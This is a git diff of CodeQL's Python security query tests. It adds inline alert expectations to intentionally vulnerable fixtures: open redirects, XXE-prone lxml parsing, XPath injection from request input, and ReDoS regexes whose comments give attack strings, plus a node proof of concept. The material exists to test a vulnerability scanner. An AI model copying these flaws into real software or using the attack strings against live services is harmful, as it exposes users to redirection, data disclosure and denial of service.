@@ -59,28 +59,28 @@ def const_str_compare(): def not_ok1(): untrusted = request.args.get('target', '') unsafe = untrusted + "?login=success" - return redirect(unsafe, code=302) + return redirect(unsafe, code=302) # $ Alert @app.route('/not_ok2') def not_ok2(): untrusted = request.args.get('target', '') unsafe = "{}?login=success".format(untrusted) - return redirect(unsafe, code=302) + return redirect(unsafe, code=302) # $ Alert @app.route('/not_ok3') def not_ok3(): untrusted = request.args.get('target', '') unsafe = f"{untrusted}?login=success" - return redirect(unsafe, code=302) + return redirect(unsafe, code=302) # $ Alert @app.route('/not_ok4') def not_ok4(): untrusted = request.args.get('target', '') unsafe = "%s?login=success" % untrusted - return redirect(unsafe, code=302) + return redirect(unsafe, code=302) # $ Alert from django.utils.http import url_has_allowed_host_and_scheme import math @@ -90,7 +90,7 @@ def ok6(): untrusted = request.args.get('target', '') # random chance. if math.random() > 0.5: - redirect(untrusted, code=302) # NOT OK + redirect(untrusted, code=302) # NOT OK # $ Alert if url_has_allowed_host_and_scheme(untrusted, allowed_hosts=None): return redirect(untrusted, code=302) # OK @@ -111,7 +111,7 @@ def not_ok5(): untrusted = request.args.get('target', '') # no backslash replace if not yarl.URL(untrusted).is_absolute(): - return redirect(untrusted, code=302) # NOT OK + return redirect(untrusted, code=302) # NOT OK # $ Alert return redirect("/", code=302) from urllib.parse import urlparse @@ -137,7 +137,7 @@ def not_ok6(): untrusted = request.args.get('target', '') # no backslash replace if not urlparse(untrusted).netloc: - return redirect(untrusted, code=302) # NOT OK + return redirect(untrusted, code=302) # NOT OK # $ Alert return redirect("/", code=302) @app.route('/not_ok7') 
@@ -145,7 +145,7 @@ def not_ok7(): untrusted = request.args.get('target', '') # wrong check if urlparse(untrusted).netloc != "": - return redirect(untrusted, code=302) # NOT OK + return redirect(untrusted, code=302) # NOT OK # $ Alert return redirect("/", code=302) @app.route('/ok10') diff --git a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected index b33d39f50718..11c3ec1b5221 100644 --- a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected +++ b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected @@ -1,3 +1,6 @@ +#select +| test.py:10:34:10:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:10:34:10:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:31:34:31:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:31:34:31:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:1:26:1:32 | ControlFlowNode for request | provenance | | | test.py:1:26:1:32 | ControlFlowNode for request | test.py:9:19:9:25 | ControlFlowNode for request | provenance | | 
@@ -16,6 +19,3 @@ nodes | test.py:20:19:20:25 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | test.py:31:34:31:44 | ControlFlowNode for xml_content | semmle.label | ControlFlowNode for xml_content | subpaths -#select -| test.py:10:34:10:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:10:34:10:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:31:34:31:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:31:34:31:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref index 62a3f7f22d97..9473e8620152 100644 --- a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref +++ b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.qlref @@ -1 +1,2 @@ -Security/CWE-611/Xxe.ql +query: Security/CWE-611/Xxe.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-611-Xxe/test.py b/python/ql/test/query-tests/Security/CWE-611-Xxe/test.py index 104f2663d59e..e84a05a76632 100644 --- a/python/ql/test/query-tests/Security/CWE-611-Xxe/test.py +++ b/python/ql/test/query-tests/Security/CWE-611-Xxe/test.py @@ -1,4 +1,4 @@ -from flask import Flask, request +from flask import Flask, request # $ Source import lxml.etree import markupsafe 
@@ -7,7 +7,7 @@ @app.route("/vuln-handler") def vuln_handler(): xml_content = request.args['xml_content'] - return lxml.etree.fromstring(xml_content).text + return lxml.etree.fromstring(xml_content).text # $ Alert @app.route("/safe-handler") def safe_handler(): @@ -28,7 +28,7 @@ def super_vuln_handler(): # allows DoS attacks huge_tree=True, ) - return lxml.etree.fromstring(xml_content, parser=parser).text + return lxml.etree.fromstring(xml_content, parser=parser).text # $ Alert @app.route("/sanitized-handler") def sanitized_handler(): diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected index 4b1a2c40f7cf..6c13896e7884 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected 
@@ -1,3 +1,10 @@ +#select +| xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | XPath expression depends on a $@. | xpathBad.py:9:7:9:13 | ControlFlowNode for request | user-provided value | +| xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. 
| xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:10:5:10:9 | ControlFlowNode for value | provenance | AdditionalTaintStep | | xpathBad.py:10:5:10:9 | ControlFlowNode for value | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | provenance | | 
@@ -59,10 +66,3 @@ nodes | xpathFlow.py:47:18:47:44 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | semmle.label | ControlFlowNode for xpathQuery | subpaths -#select -| xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | XPath expression depends on a $@. | xpathBad.py:9:7:9:13 | ControlFlowNode for request | user-provided value | -| xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. 
| xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.qlref b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.qlref index a61523e1767a..20ce4fdfd933 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.qlref +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.qlref @@ -1 +1,2 @@ -Security/CWE-643/XpathInjection.ql +query: Security/CWE-643/XpathInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathBad.py b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathBad.py index ee836dd385eb..26a2f8d0d9a1 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathBad.py +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathBad.py @@ -6,11 +6,11 @@ from django.template import Template, Context, Engine, engines -def a(request): +def a(request): # $ Source value = request.GET['xpath'] f = StringIO('') tree = etree.parse(f) - r = tree.xpath("/tag[@id='%s']" % value) + r = tree.xpath("/tag[@id='%s']" % value) # $ Alert urlpatterns = [ diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathFlow.py b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathFlow.py index c2fe2ce1edb3..0a4f97ce30e7 100644 --- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathFlow.py +++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/xpathFlow.py @@ -1,5 +1,5 @@ from io import StringIO -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @@ -11,7 +11,7 @@ def xpath1(): xpathQuery = request.args.get('xml', '') f = StringIO('') tree = etree.parse(f) - r = tree.xpath(xpathQuery) + r = tree.xpath(xpathQuery) # $ Alert @app.route("/xpath2") 
@@ -20,7 +20,7 @@ def xpath2(): xpathQuery = request.args.get('xml', '') root = etree.XML("TEXT") - find_text = etree.XPath(xpathQuery) + find_text = etree.XPath(xpathQuery) # $ Alert text = find_text(root)[0] @@ -29,7 +29,7 @@ def xpath3(): from lxml import etree xpathQuery = request.args.get('xml', '') root = etree.XML("TEXT") - find_text = etree.XPath(xpathQuery, smart_strings=False) + find_text = etree.XPath(xpathQuery, smart_strings=False) # $ Alert text = find_text(root)[0] @@ -38,7 +38,7 @@ def xpath4(): from lxml import etree xpathQuery = request.args.get('xml', '') root = etree.XML("TEXT") - find_text = etree.ETXPath(xpathQuery) + find_text = etree.ETXPath(xpathQuery) # $ Alert text = find_text(root)[0] @app.route("/xpath5") @@ -46,4 +46,4 @@ def xpath5(): import libxml2 xpathQuery = request.args.get('xml', '') doc = libxml2.parseFile('xpath_injection/credential.xml') - results = doc.xpathEval(xpathQuery) + results = doc.xpathEval(xpathQuery) # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected index aa8cea07ed16..22fcfd05fa19 100644 --- a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected +++ b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected 
@@ -1,3 +1,9 @@ +#select +| test.py:8:30:8:33 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:8:30:8:33 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:8:19:8:21 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:9:32:9:35 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:9:32:9:35 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with '0.9' and with many repetitions of '99'. | test.py:9:25:9:27 | \\d+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:12:17:12:20 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:12:17:12:20 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:11:29:11:31 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:16:24:16:30 | ControlFlowNode for my_text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:16:24:16:30 | ControlFlowNode for my_text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:18:21:18:23 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:21:18:21:21 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:21:18:21:21 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. 
| test.py:20:271:20:272 | .* | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:2:26:2:32 | ControlFlowNode for request | provenance | | | test.py:2:26:2:32 | ControlFlowNode for request | test.py:7:12:7:18 | ControlFlowNode for request | provenance | | 
@@ -26,9 +32,3 @@ nodes | test.py:18:28:18:31 | ControlFlowNode for text | semmle.label | ControlFlowNode for text | | test.py:21:18:21:21 | ControlFlowNode for text | semmle.label | ControlFlowNode for text | subpaths -#select -| test.py:8:30:8:33 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:8:30:8:33 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:8:19:8:21 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:9:32:9:35 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:9:32:9:35 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with '0.9' and with many repetitions of '99'. | test.py:9:25:9:27 | \\d+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:12:17:12:20 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:12:17:12:20 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:11:29:11:31 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:16:24:16:30 | ControlFlowNode for my_text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:16:24:16:30 | ControlFlowNode for my_text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| test.py:18:21:18:23 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:21:18:21:21 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:21:18:21:21 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | test.py:20:271:20:272 | .* | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.qlref b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.qlref index 8c457eb7467e..1847f552d933 100644 --- a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.qlref +++ b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.qlref @@ -1 +1,2 @@ -Security/CWE-730/PolynomialReDoS.ql +query: Security/CWE-730/PolynomialReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/test.py b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/test.py index 622fa6803b90..bb0a53e4d14e 100644 --- a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/test.py +++ b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/test.py 
@@ -1,22 +1,22 @@ import re -from flask import Flask, request +from flask import Flask, request # $ Source app = Flask(__name__) @app.route("/poly-redos") def code_execution(): text = request.args.get("text") - re.sub(r"^\s+|\s+$", "", text) # NOT OK - re.match(r"^0\.\d+E?\d+$", text) # NOT OK + re.sub(r"^\s+|\s+$", "", text) # NOT OK # $ Alert + re.match(r"^0\.\d+E?\d+$", text) # NOT OK # $ Alert reg = re.compile(r"^\s+|\s+$") - reg.sub("", text) # NOT OK + reg.sub("", text) # NOT OK # $ Alert def indirect(input_reg_str, my_text): my_reg = re.compile(input_reg_str) - my_reg.sub("", my_text) # NOT OK + my_reg.sub("", my_text) # NOT OK # $ Alert indirect(r"^\s+|\s+$", text) reg2 = re.compile(r"(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)(AA|BB)C.*Y") - reg2.sub("", text) # NOT OK + reg2.sub("", text) # NOT OK # $ Alert diff --git a/python/ql/test/query-tests/Security/CWE-730-ReDoS/KnownCVEs.py b/python/ql/test/query-tests/Security/CWE-730-ReDoS/KnownCVEs.py index 14a8ff528090..6e63bf28f3c1 100644 --- a/python/ql/test/query-tests/Security/CWE-730-ReDoS/KnownCVEs.py +++ b/python/ql/test/query-tests/Security/CWE-730-ReDoS/KnownCVEs.py @@ -12,7 +12,7 @@ toFlag = re.compile(newline) # https://github.com/github/codeql-python-CVE-coverage/issues/400 -re.compile(r'[+-]?(\d+)*\.\d+%?') +re.compile(r'[+-]?(\d+)*\.\d+%?') # $ Alert re.compile(r'"""\s+(?:.|\n)*?\s+"""') re.compile(r'(\{\s+)(\S+)(\s+[^}]+\s+\}\s)') re.compile(r'".*``.*``.*"') 
@@ -27,12 +27,12 @@ simple_email_re = re.compile(r"^\S+@[a-zA-Z0-9._-]+\.[a-zA-Z0-9._-]+$") # https://github.com/github/codeql-python-CVE-coverage/issues/249 -rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+' +rx = re.compile('(?:.*,)*[ \t]*([^ \t]+)[ \t]+' # $ Alert 'realm=(["\']?)([^"\']*)\\2', re.I) # https://github.com/github/codeql-python-CVE-coverage/issues/248 gauntlet = re.compile( - r"""^([-/:,#%.'"\s!\w]|\w-\w|'[\s\w]+'\s*|"[\s\w]+"|\([\d,%\.\s]+\))*$""", + r"""^([-/:,#%.'"\s!\w]|\w-\w|'[\s\w]+'\s*|"[\s\w]+"|\([\d,%\.\s]+\))*$""", # $ Alert flags=re.U ) diff --git a/python/ql/test/query-tests/Security/CWE-730-ReDoS/ReDoS.qlref b/python/ql/test/query-tests/Security/CWE-730-ReDoS/ReDoS.qlref index 4c19d395edbe..2cc0b9cb67cb 100644 --- a/python/ql/test/query-tests/Security/CWE-730-ReDoS/ReDoS.qlref +++ b/python/ql/test/query-tests/Security/CWE-730-ReDoS/ReDoS.qlref @@ -1 +1,2 @@ -Security/CWE-730/ReDoS.ql +query: Security/CWE-730/ReDoS.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/python/ql/test/query-tests/Security/CWE-730-ReDoS/redos.py b/python/ql/test/query-tests/Security/CWE-730-ReDoS/redos.py index 4aad94021e40..736bb5a936e5 100644 --- a/python/ql/test/query-tests/Security/CWE-730-ReDoS/redos.py +++ b/python/ql/test/query-tests/Security/CWE-730-ReDoS/redos.py @@ -3,7 +3,7 @@ # NOT GOOD; attack: "_" + "__".repeat(100) # Adapted from marked (https://github.com/markedjs/marked), which is licensed # under the MIT license; see file marked-LICENSE. -bad1 = re.compile(r'''^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)''') +bad1 = re.compile(r'''^\b_((?:__|[\s\S])+?)_\b|^\*((?:\*\*|[\s\S])+?)\*(?!\*)''') # $ Alert # GOOD # Adapted from marked (https://github.com/markedjs/marked), which is licensed 
@@ -18,7 +18,7 @@ # NOT GOOD; attack: " '" + "\\\\".repeat(100) # Adapted from CodeMirror (https://github.com/codemirror/codemirror), # which is licensed under the MIT license; see file CodeMirror-LICENSE. -bad2 = re.compile(r'''^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?''') +bad2 = re.compile(r'''^(?:\s+(?:"(?:[^"\\]|\\\\|\\.)+"|'(?:[^'\\]|\\\\|\\.)+'|\((?:[^)\\]|\\\\|\\.)+\)))?''') # $ Alert # GOOD # Adapted from lulucms2 (https://github.com/yiifans/lulucms2). 
@@ -30,53 +30,53 @@ good3 = re.compile(r'''^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)\n*''') # NOT GOOD, variant of good3; attack: "a|\n:|\n" + "||\n".repeat(100) -bad4 = re.compile(r'''^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a''') +bad4 = re.compile(r'''^ *(\S.*\|.*)\n *([-:]+ *\|[-| :]*)\n((?:.*\|.*(?:\n|$))*)a''') # $ Alert # NOT GOOD; attack: "/" + "\\/a".repeat(100) # Adapted from ANodeBlog (https://github.com/gefangshuai/ANodeBlog), # which is licensed under the Apache License 2.0; see file ANodeBlog-LICENSE. -bad5 = re.compile(r'''\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)''') +bad5 = re.compile(r'''\/(?![ *])(\\\/|.)*?\/[gim]*(?=\W|$)''') # $ Alert # NOT GOOD; attack: "##".repeat(100) + "\na" # Adapted from CodeMirror (https://github.com/codemirror/codemirror), # which is licensed under the MIT license; see file CodeMirror-LICENSE. -bad6 = re.compile(r'''^([\s\[\{\(]|#.*)*$''') +bad6 = re.compile(r'''^([\s\[\{\(]|#.*)*$''') # $ Alert # GOOD good4 = re.compile(r'''(\r\n|\r|\n)+''') # BAD - PoC: `node -e "/((?:[^\"\']|\".*?\"|\'.*?\')*?)([(,)]|$)/.test(\"'''''''''''''''''''''''''''''''''''''''''''''\\\"\");"`. It's complicated though, because the regexp still matches something, it just matches the empty-string after the attack string. -actuallyBad = re.compile(r'''((?:[^"']|".*?"|'.*?')*?)([(,)]|$)''') +actuallyBad = re.compile(r'''((?:[^"']|".*?"|'.*?')*?)([(,)]|$)''') # $ Alert # NOT GOOD; attack: "a" + "[]".repeat(100) + ".b\n" # Adapted from Knockout (https://github.com/knockout/knockout), which is # licensed under the MIT license; see file knockout-LICENSE -bad6 = re.compile(r'''^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$''') +bad6 = re.compile(r'''^[\_$a-z][\_$a-z0-9]*(\[.*?\])*(\.[\_$a-z][\_$a-z0-9]*(\[.*?\])*)*$''') # $ Alert # GOOD good6 = re.compile(r'''(a|.)*''') # Testing the NFA - only some of the below are detected. 
-bad7 = re.compile(r'''^([a-z]+)+$''') -bad8 = re.compile(r'''^([a-z]*)*$''') -bad9 = re.compile(r'''^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$''') -bad10 = re.compile(r'''^(([a-z])+.)+[A-Z]([a-z])+$''') +bad7 = re.compile(r'''^([a-z]+)+$''') # $ Alert +bad8 = re.compile(r'''^([a-z]*)*$''') # $ Alert +bad9 = re.compile(r'''^([a-zA-Z0-9])(([\\-.]|[_]+)?([a-zA-Z0-9]+))*(@){1}[a-z0-9]+[.]{1}(([a-z]{2,3})|([a-z]{2,3}[.]{1}[a-z]{2,3}))$''') # $ Alert +bad10 = re.compile(r'''^(([a-z])+.)+[A-Z]([a-z])+$''') # $ Alert # NOT GOOD; attack: "[" + "][".repeat(100) + "]!" # Adapted from Prototype.js (https://github.com/prototypejs/prototype), which # is licensed under the MIT license; see file Prototype.js-LICENSE. -bad11 = re.compile(r'''(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)''') +bad11 = re.compile(r'''(([\w#:.~>+()\s-]+|\*|\[.*?\])+)\s*(,|$)''') # $ Alert # NOT GOOD; attack: "'" + "\\a".repeat(100) + '"' # Adapted from Prism (https://github.com/PrismJS/prism), which is licensed # under the MIT license; see file Prism-LICENSE. -bad12 = re.compile(r'''("|')(\\?.)*?\1''') +bad12 = re.compile(r'''("|')(\\?.)*?\1''') # $ Alert # NOT GOOD -bad13 = re.compile(r'''(b|a?b)*c''') +bad13 = re.compile(r'''(b|a?b)*c''') # $ Alert # NOT GOOD -bad15 = re.compile(r'''(a|aa?)*b''') +bad15 = re.compile(r'''(a|aa?)*b''') # $ Alert # GOOD good7 = re.compile(r'''(.|\n)*!''') 
@@ -88,31 +88,31 @@ good8 = re.compile(r'''([\w.]+)*''') # NOT GOOD -bad17 = re.compile(r'''(a|aa?)*b''') +bad17 = re.compile(r'''(a|aa?)*b''') # $ Alert # GOOD - not used as regexp good9 = '(a|aa?)*b' # NOT GOOD -bad18 = re.compile(r'''(([\s\S]|[^a])*)"''') +bad18 = re.compile(r'''(([\s\S]|[^a])*)"''') # $ Alert # GOOD - there is no witness in the end that could cause the regexp to not match good10 = re.compile(r'''([^"']+)*''') # NOT GOOD -bad20 = re.compile(r'''((.|[^a])*)"''') +bad20 = re.compile(r'''((.|[^a])*)"''') # $ Alert # GOOD good10 = re.compile(r'''((a|[^a])*)"''') # NOT GOOD -bad21 = re.compile(r'''((b|[^a])*)"''') +bad21 = re.compile(r'''((b|[^a])*)"''') # $ Alert # NOT GOOD -bad22 = re.compile(r'''((G|[^a])*)"''') +bad22 = re.compile(r'''((G|[^a])*)"''') # $ Alert # NOT GOOD -bad23 = re.compile(r'''(([0-9]|[^a])*)"''') +bad23 = re.compile(r'''(([0-9]|[^a])*)"''') # $ Alert # NOT GOOD bad24 = re.compile(r'''(?:=(?:([!#\$%&'\*\+\-\.\^_`\|~0-9A-Za-z]+)|"((?:\\[\x00-\x7f]|[^\x00-\x08\x0a-\x1f\x7f"])*)"))?''') 
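Review bot: `bad24`, the trailing context line of this hunk, is commented `# NOT GOOD` but carries no expectation, so the converted test no longer records whether the ReDoS query is meant to report it. If it is a known missed detection (inferred from the absent `# $ Alert`; the old `.expected` rows for this file are not visible here), annotate it as `# $ MISSING: Alert` so the coverage gap stays explicit. The same applies to `bad74` in the `@@ -331,44 +331,44 @@` hunk, whose comment says `NOT GOOD - but not detected.`; in that hunk `bad77` has the opposite problem, since it now carries `# $ Alert` while its comment still says `but not detected`, so that clause should be dropped.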
